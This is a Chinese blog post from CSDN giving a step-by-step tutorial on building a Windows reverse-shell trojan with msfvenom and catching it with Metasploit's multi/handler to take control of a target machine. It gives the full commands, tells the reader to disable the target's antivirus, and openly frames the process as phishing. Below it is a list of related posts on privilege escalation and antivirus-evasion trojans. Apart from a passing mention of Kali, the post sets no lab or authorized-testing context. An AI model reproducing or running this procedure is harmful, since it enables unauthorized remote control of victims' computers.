利用msf生成木马后门获取目标机控制权限

最新推荐文章于 2024-04-22 18:53:31 发布
最新推荐文章于 2024-04-22 18:53:31 发布
阅读量238 收藏 1
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73385645/article/details/132596127
版权

1.打开kali获取root权限

2.使用msf生成木马后门   (制作鱼钩)

        输入:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本地ip lport=自定义端口 -f                  exe -o demo9999.exe
        参数:

                -p payload 攻击载荷

                windows 目标机器系统版本

                demo9999.exe 木马后门程序的名称

                -f 输出木马文件的格式

                -o 输入地址

        配置好参数回车之后有如下提示即生成成功

        

        

        将目标程序放入目标机  (注意关闭安全中心病毒扫描设置,否则木马程序会被清除)

3.利用msfconsole等待获取目标机操作权限   (钓鱼)

        运行msfconsole:msfconsole

        选择模块:use exploit/multi/handler

        配置攻击载荷:windows/x64/meterpreter/reverse_tcp                   配置监听地址:set lhost 本地ip

         配置监听端口:set lport 与之前木马文件自定义端口一致

        运行:run

        有如下提示即运行成功

    

3.拿到目标机控制权限

        当目标机打开exe木马后门时会有如下提示

        此时已经拿到目标机的操作权限

        输入help即可查看可执行命令

        

        

        

        

周书德
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
[KALI第三章]MSF获取对方system权限
weixin_45919207的博客
08-29 1050
[KALI第三章]MSF获取对方system权限准备初始化并打开MSF开始入侵过程验证是否入侵成功怎样防范KALI系列传送门 准备 攻击KALI IP 被攻击Windows server2008 R2 IP 192.168.85.131 192.168.85.130 初始化并打开MSF 注意:首次使用才需初始化 /etc/init.d/postgresql start msfdb init msfconsole 开始 入侵过程 1.我们先使用一个辅助模块 use auxiliary
第九十七课:msf配置自定义payload控制目标权限1
08-03
攻击配置如下:Name Current Setting Required DescriptionRHOST 192.168.1.119 yes The tar
使用MSF进行提权(windows提权、linux提权、wesng使用
喜欢Python编程的程序员柚柚呀
04-22 510
​​MSF Windows提权​​​​反弹shell​​​​提权​​​​END推荐阅读​​​​MSF Linux提权​​​​反弹shell​​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
权限提升-Web权限-MSF自动化
m0_65336233的博客
11-26 1057
简单的提权漏洞讲解
MSF/CS框架提权姿势
懂进攻知防守
08-13 2165
提权,就是提高自己在服务器中的权限。比如在windows下从普通用户提升到administrator或者system权限,linux下普通用户提升到root权限。用户的权限决定了其能够访问的资源。在渗透测试中,我们通过某种方式(比如上传webshell)获取到一个执行命令的shell,但它是一个低权限用户,所以不能执行某些系统命令或者访问某些关键系统资源。此时如果我们想要获取更高的控制权就需要提权。...
【工具使用】——Metasploit(MSF)使用详解(超详细),2024年最新腾讯网络安全面试必问
2401_83946315的博客
04-19 1222
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
使用MSF通过MS17-010获取系统权限
auixc68226的专栏
09-27 695
---恢复内容开始--- Step1:开启postgresql数据库; /etc/init.d/postgresql start Step2:进入MSF中,搜索cve17-010相关的exp; search 17-010   其中,auxiliary/scanner/smb/smb_ms17_010 是扫描漏洞是否存在的辅助工具      exp...
msf-Msfvenonm生成后门木马
weixin_45588247的博客
08-27 1万+
msf-Msfvenonm生成后门木马实验 文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 : 一、工具: Metasploit Framework(MSF)漏洞利用框架 二、实验环境: 靶   : windows10虚拟:192.
使用MSF进行提权(windows提权、linux提权、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows提权 靶: Win server2003 + iis(已.
MSF给正常程序添加后门
永远是少年
06-10 1507
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。 一、后门制作 二、监听开启 三、效果检验 (一)软件查杀测评 (二)软件效果检验
MSF-02-木马捆绑
purvispanwu的博客
08-09 1056
木马捆绑
第九十七课:MSF配置自定义Payload控制目标权限.docx
09-15
第九十七课:MSF配置自定义Payload控制目标权限.docx
E004-渗透测试常用工具-使用MSF实现Web传递获取权限.pdf
12-02
E004-渗透测试常用工具-使用MSF实现Web传递获取权限
捆绑免杀无后门木马
11-22
捆绑免杀无后门木马,使用请参照详细说明,请别用于非法途径,否则后果自负
msf使用方法
06-29
msf使用方法,很详细,你值得拥有
内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)
网络安全领域___专研者.
03-22 1万+
Msfconsole工具概括: Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用. (1)进行端口扫描. (2)进行服务的扫描.(3)扫描3306(Mysql)端口的弱口令.(4)在msf模块里也可以使用nmap进行扫描.(5)扫描了服务器是用Win XP,然后对服务器进行渗透测试.
利用msfvenom生成后门木马
qq_28147861的博客
01-18 2699
msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。 用msfvenom生成一个PHP语言的PNG图片木马 代码:msfvenom -p php/meterpreter/reverse_tcp lh
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8254
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
最新发布
05-31
【优质项目推荐】 1、项目代码均经过严格本地测试,运行OK,确保功能稳定后才上传平台。可放心下载并立即投入使用,若遇到任何使用问题,随时欢迎私信反馈与沟通,博主会第一时间回复。 2、项目适用于计算相关专业(如计科、信息安全、数据科学、人工智能、通信、物联网、自动化、电子信息等)的在校学生、专业教师,或企业员工,小白入门等都适用。 3、该项目不仅具有很高的学习借鉴价值,对于初学者来说,也是入门进阶的绝佳选择;当然也可以直接用于 毕设、课设、期末大作业或项目初期立项演示等。 3、开放创新:如果您有一定基础,且热爱探索钻研,可以在此代码基础上二次开发,进行修改、扩展,创造出属于自己的独特应用。 欢迎下载使用优质资源!欢迎借鉴使用,并欢迎学习交流,共同探索编程的无穷魅力! 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
msf生成linux木马
03-16
MSF是Metasploit Framework的缩写,是一款常用的渗透测试工具。要生成Linux木马,可以使用MSF中的payload生成器来创建一个适合Linux系统的payload,然后使用MSF中的exploit模块来利用漏洞,将payload注入到目标系统中,从而实现远程控制。具体操作可以参考MSF的官方文档或相关教程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

周书德

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值